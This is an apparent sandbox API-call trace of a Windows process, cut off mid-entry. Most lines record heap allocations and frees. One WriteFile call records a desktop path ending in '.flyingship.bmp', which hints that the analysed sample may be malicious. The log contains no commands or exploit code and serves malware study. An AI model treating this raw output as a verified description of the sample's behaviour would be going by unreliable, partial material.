RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0164.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923ad0 [0164.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp\r\n", cchWideChar=78, lpMultiByteStr=0x923ad0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp\r\n", lpUsedDefaultChar=0x0) returned 78 [0164.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0164.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0164.820] WriteFile (in: hFile=0x120, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4d, lpOverlapped=0x0) returned 1 [0164.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0164.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.821] CloseHandle (hObject=0x120) returned 1 [0164.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0164.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0164.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0164.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0164.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0164.824] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0164.825] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0164.826] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0164.826] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.826] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0164.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0164.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0164.826] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0164.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0164.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0164.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0164.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0164.827] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0164.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0164.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0164.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0164.831] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.833] RtlAllocateHeap (HeapHandle=0x8a0000, 